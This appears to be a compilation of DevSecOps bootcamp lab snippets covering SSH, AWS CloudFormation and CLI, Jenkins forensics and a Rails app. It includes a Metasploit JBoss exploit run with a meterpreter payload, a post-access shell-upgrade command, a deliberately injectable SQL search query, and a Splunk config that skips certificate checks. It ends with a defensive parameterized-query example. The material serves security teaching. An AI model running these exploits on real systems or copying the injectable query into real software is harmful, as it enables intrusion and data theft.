Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md

Connects to the bastion instance using SSH with agent forwarding enabled.
Use `-A` to forward your SSH agent so the key loaded in it can be used from the bastion. Verify key presence with `ssh-add -l`.

```bash
ssh -A student1@52.x.x.x
```

--------------------------------

### Implement Search in Index Action

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Adds search functionality to the `index` action of the `bootcamps` controller. It filters bootcamps by name if a search parameter is provided.

```ruby
def index
  @bootcamps = Bootcamp.all
  if params[:search].to_s != ''
    # params[:search] is interpolated directly into the SQL fragment
    @bootcamps = Bootcamp.where("name LIKE '%#{params[:search]}%'")
  else
    @bootcamps = Bootcamp.all
  end
end
```

--------------------------------

### Trace Execution of a Custom Binary

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md

Uses `strace` to trace the system calls made by a custom binary, revealing its behavior such as opening network ports.

```bash
strace /mnt//jenkins/tmp/si8xE3
```

--------------------------------

### SSH into Application Instance

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md

Connects to the application instance from the bastion using SSH. Assumes default user `ec2-user`.

```bash
ssh ec2-user@10.0.0.x
```

--------------------------------

### Connect to EC2 Instance

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md

Connect to your AWS EC2 instance using SSH with a specified private key.

```bash
ssh -i ~/Downloads/jg.pem ec2-user@54.x.x.x
```

--------------------------------

### CloudFormation Launch Configuration Resource

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md

Defines a Launch Configuration for an Auto Scaling Group. This specifies the instance details, including security groups, AMI, instance type, and key pair.
```json
"WebServerInstance": {
  "Type": "AWS::AutoScaling::LaunchConfiguration",
  "Properties": {
    "SecurityGroups": [ { "Ref": "AppSecurityGroup" } ],
    "ImageId": { "Ref": "AmiId" },
    "InstanceType": { "Ref": "InstanceType" },
    "KeyName": { "Ref": "KeyName" },
    "UserData": { ... }
  }
}
```

--------------------------------

### Basic CloudFormation Template Structure

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-1.md

This snippet shows the minimum required sections for a CloudFormation template: AWSTemplateFormatVersion, Description, Parameters, Resources, and Outputs.

```json
{
  "AWSTemplateFormatVersion": "2010-09-09",
  "Description": "...",
  "Parameters": { },
  "Resources": { },
  "Outputs": { }
}
```

--------------------------------

### Lab #2 Outline

Source: https://github.com/devsecops/bootcamp/blob/master/Week-8/LESSON-2.md

This snippet outlines the key components or steps for Lab #2. It is presented as a list.

```text
* * * * *
```

--------------------------------

### List Jenkins User Home Directory Contents

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md

Lists all files and directories within the Jenkins user's home directory.

```bash
ls -a /mnt//jenkins/var/lib/jenkins
```

--------------------------------

### AWS CLI Configuration Prompt

Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md

This is the expected interactive prompt when configuring the AWS CLI. Fill in your AWS credentials and desired region/format.

```text
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]:
Default output format [None]:
```

--------------------------------

### Create and Count Words in a Text File

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Creates a new text file using 'cat' and then counts the words within it. Press Ctrl+D to finish input.

```bash
$ cat > file.txt
this is my file, there are many like it but this one is mine...
^D
```

--------------------------------

### Set Root Route

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Sets the root route of the application to the index action of the bootcamps controller.

```ruby
root 'bootcamps#index'
```

--------------------------------

### Display Network Information

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md

Shows network interface configuration (ifconfig), routing table (route), and network connections (netstat).

```bash
$ ifconfig
$ route
$ netstat -na
```

--------------------------------

### Clone Selfie Repository

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md

Clone the Selfie tool's Git repository to your local machine to begin the automation process.

```bash
$ git clone https://github.com/devsecops/selfie.git
```

--------------------------------

### Gather IAM Configuration

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md

Collect IAM configuration details using AWS CLI. This helps in understanding user permissions and policies.

```bash
aws iam list-users --region us-east-1 > iam-users.json
aws iam list-roles --region us-east-1 > iam-roles.json
aws iam list-policies --region us-east-1 > iam-policies.json
```

--------------------------------

### View Jenkins Auth Log

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md

Displays the Jenkins authentication log to review system user activity.

```bash
sudo cat /mnt//jenkins/var/log/auth.log
```

--------------------------------

### Add Search Form to Index View

Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md

Adds a search form to the `index` view for bootcamps, allowing users to input search terms.

```erb

Search

<%= form_tag(bootcamps_path, method: "get", id: "search-form") do %>
  <%= text_field_tag :search, params[:search], placeholder: "Search Bootcamps" %>
  <%= submit_tag "Search Bootcamps"%>
<% end %>

Listing Bootcamps

```

--------------------------------

### Upload Configuration Files to S3

Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-1.md

Iterate through all JSON files in the current directory and upload them to the specified S3 bucket using the AWS CLI. This command is used to store collected forensic data.

```bash
# Glob directly instead of parsing `ls`, and quote the name so spaces survive
for FILE in *.json; do
  aws s3 cp "$FILE" s3://dso-bootcamp-forensics/student1/
done
```

--------------------------------

### Spawn Bash Shell

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md

Use this Python command to spawn an interactive bash shell after gaining initial access.

```bash
> shell
python -c 'import pty; pty.spawn("/bin/bash")'
[ec2-user@ip-10-0-2-43 jboss-5.1.0.GA]$ cd ~
```

--------------------------------

### List Stacks with Restacker

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md

Command to list all current stacks managed by Restacker for a specific application and user context.

```bash
$ restacker list -l myapp -u student1 -c dso
```

--------------------------------

### Exploit JBoss DeploymentFileRepository WAR Deployment

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md

Configure and run the JBoss DeploymentFileRepository WAR Deployment exploit. Set the target host, exploit target, payload, and listener port (LPORT) based on your student ID.

```bash
> use exploit/multi/http/jboss_invoke_deploy
> set RHOST 10.0.6.165
> set target 1
> set payload java/meterpreter/bind_tcp
> set LPORT 10001
> exploit
```

--------------------------------

### Configure AWS CLI Profile

Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-1.md

Configure AWS CLI with access keys and a default region for a specific profile. This is typically done after downloading credentials.
```bash
aws configure --profile dso
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]: us-west-2
Default output format [None]: json
```

--------------------------------

### Create AWS IAM User

Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md

Create a new IAM user and group in AWS, matching your student ID.

```bash
$ aws iam create-user --user-name hacker1
$ aws iam create-group --group-name hacker1
$ aws iam add-user-to-group --group-name hacker1 --user-name hacker1
```

--------------------------------

### Configure Splunk Outputs

Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md

Configures the Splunk Universal Forwarder to send logs to a specified server group.

```bash
"echo \"[tcpout]\n",
"defaultGroup = dso-autolb-group\n",
"\n",
"[tcpout:dso-autolb-group]\n",
"disabled = false\n",
"dropEventsOnQueueFull = 10\n",
"server = appliance:9997\n",
"sslCertPath = \\\$SPLUNK_HOME/etc/auth/server.pem\n",
"sslPassword = password\n",
"sslRootCAPath = \\\$SPLUNK_HOME/etc/auth/cacert.pem\n",
"sslVerifyServerCert = false\n",
"useACK = false\" >> /opt/splunkforwarder/etc/system/local/outputs.conf\n"
```
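--------------------------------

The `index` search action from Week-2 LAB-2 above builds its `where` fragment by interpolating `params[:search]` into the SQL text. As an added example (not part of the bootcamp material), this plain-Ruby code puts that construction beside a parameterized one and shows what each does with an apostrophe and with LIKE wildcards. The helper names and sample terms are constructed for illustration; the Rails call in the opening comment is the equivalent controller code.

```ruby
# Added example, not from the lab. Plain Ruby so it runs without Rails.
# Equivalent controller code with ActiveRecord bind parameters:
#   term = Bootcamp.sanitize_sql_like(params[:search].to_s)
#   @bootcamps = Bootcamp.where("name LIKE ?", "%#{term}%")

# Mirrors the lab's fragment: the search term becomes part of the SQL text.
def interpolated_where(term)
  "name LIKE '%#{term}%'"
end

# Escape LIKE metacharacters so the term matches literally. Backslash is
# MySQL's default LIKE escape character (the lab app is created with -d mysql).
def escape_like(term)
  term.gsub(/[\\%_]/) { |ch| "\\#{ch}" }
end

# Parameterized form: a fixed SQL template plus a bind value that the
# database layer quotes, instead of pasting it into the statement text.
def parameterized_where(term)
  ["name LIKE ?", "%#{escape_like(term)}%"]
end

# An odd number of single quotes means a string literal no longer closes
# where the developer intended: the input changed the statement's structure.
def balanced_quotes?(sql)
  sql.count("'").even?
end

# Side-by-side view of both constructions for one search term.
def compare(term)
  template, bind = parameterized_where(term)
  { interpolated: interpolated_where(term),
    interpolated_intact: balanced_quotes?(interpolated_where(term)),
    template: template,
    template_intact: balanced_quotes?(template),
    bind: bind }
end

# Constructed sample terms: ordinary word, apostrophe, LIKE wildcards.
SAMPLE_TERMS = ["rails", "O'Reilly", "100%_done"].freeze

SAMPLE_TERMS.each { |t| p compare(t) } if __FILE__ == $PROGRAM_NAME
```

With the interpolated form, a legitimate search for a name containing an apostrophe already produces a malformed statement; the template in the parameterized form is identical for every input.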